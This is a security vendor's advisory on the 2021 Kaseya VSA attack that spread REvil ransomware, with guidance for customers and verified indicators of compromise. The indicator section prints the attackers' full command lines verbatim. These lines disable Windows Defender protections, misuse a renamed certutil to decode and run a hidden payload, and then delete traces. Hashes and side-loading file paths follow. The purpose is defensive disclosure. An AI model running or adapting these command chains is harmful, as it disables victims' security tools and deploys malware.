Update: July 13, 2021 -- Kaseya issued a critical security update for VSA users that is available on their site - Kaseya Critical Security Update. We recommend users follow Kaseya's recommended updates as soon as possible.
- - - - - - - - - - - - - - -
We continue to monitor and analyze the attack using Kaseya Software to deploy a variant of REvil ransomware into a victim’s environment. The attack targeted Kaseya’s managed service provider (MSP) customers, which often provide IT support to small- to medium-size businesses. By targeting MSPs, attackers also seek to access and infiltrate the MSP’s customers computer networks.
Guidance for Bitdefender Customers
- Kaseya issued an advisory and has urged their customers to immediately shut down on-premises VSA servers. We recommend that any Kaseya VSA users follow this guidance immediately.
- Check on-premises and hybrid environments for known indicators of compromise (IoCs) - list of IoCs is below.
- The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert stating that they are monitoring details about the attack against Kaseya VSA and the multiple MSPs that use VSA software. We recommend organizations follow the CISA alert for future updates.
We continue to monitor and assess any customer impact, and will develop further guidance as appropriate, including how Bitdefender customers can protect or mitigate impacts to affected systems. Our Labs team findings to date indicate Bitdefender solutions detect and block a command line action and delivered payloads used in the attack, thus, protecting customers from this step in the attack. If you are a Kaseya user and believe that you are impacted, please contact us at: gzn-gs@bitdefender.com
Verified Indicators of Compromise
- Command line executed from Kaseya agent:
C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
and
C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe
2. Hashes:- 561cffbaba71a6e8cc1cdceda990ead4, detected by Bitdefender with Gen:Variant.Graftor.952042 from 15.May.2021. This is the main executable (c:\kworking\agent.exe) that is being decoded using certutil.exe
- a47cf00aedf769d60d58bfe00c0b5421, detected by Bitdefender with Gen:Variant.Bulz.471680 from 13.May.2021. This is a DLL that is being dropped by the main executable and side loaded using a MS msmpeng.exe executable.
- 0293a5d21081a94a5589976b407f5675 – the hash for agent.crt (the content of agent.exe before decryption).
3. File paths: - c:\WaRCoMWorking\agent.crt
- c:\\WaRCoMWorking\agent.exe
- c:\kworking\agent.exe
- c:\kworking\agent.crt
- c:\windows\msmpeng.exe (an older version that is vulnerable for DLL side loading). This version is being dropped by the main executable and further used to load the DLL (a47cf00aedf769d60d58bfe00c0b5421). File version: MsMpEng.exe, Microsoft Malware Protection, 4.5.0218.0
